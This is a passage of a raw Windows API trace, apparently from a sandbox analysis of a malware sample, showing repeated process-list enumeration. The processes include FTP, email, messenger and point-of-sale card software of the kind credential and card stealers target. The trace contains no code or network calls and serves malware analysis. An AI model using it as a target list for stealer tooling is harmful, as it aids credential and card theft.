hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0198.032] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0198.035] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0198.050] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0198.052] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0198.083] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0198.085] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0198.092] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0198.095] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0198.097] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0198.100] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0198.102] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0198.105] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0198.107] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0198.111] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0198.114] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0198.117] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0198.120] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0198.123] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0198.127] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0198.133] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0198.136] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0198.139] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0198.141] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0198.144] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0198.146] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0198.149] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0198.151] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0198.154] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0198.156] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0198.160] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0198.162] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0198.165] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0198.171] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0198.174] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0198.176] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0198.180] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0198.182] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0198.185] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0198.188] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0198.191] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0198.194] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0198.197] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0198.199] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0198.202] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0198.205] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0198.212] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0198.215] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0198.218] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0198.224] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0198.227] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0198.229] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0198.232] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0198.234] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0198.237] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0198.239] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0198.242] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0198.245] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0198.248] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0198.255] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0198.258] CloseHandle (hObject=0x19c8) returned 1 [0198.258] Sleep (dwMilliseconds=0x64) [0198.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x207c [0198.386] Process32First (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.387] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0198.389] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0198.391] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.393] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0198.394] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.396] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0198.398] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0198.400] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0198.401] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.403] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.405] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0198.407] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.408] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.438] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.439] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.441] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.443] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.445] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.447] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0198.449] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0198.451] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.452] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0198.454] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.456] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: 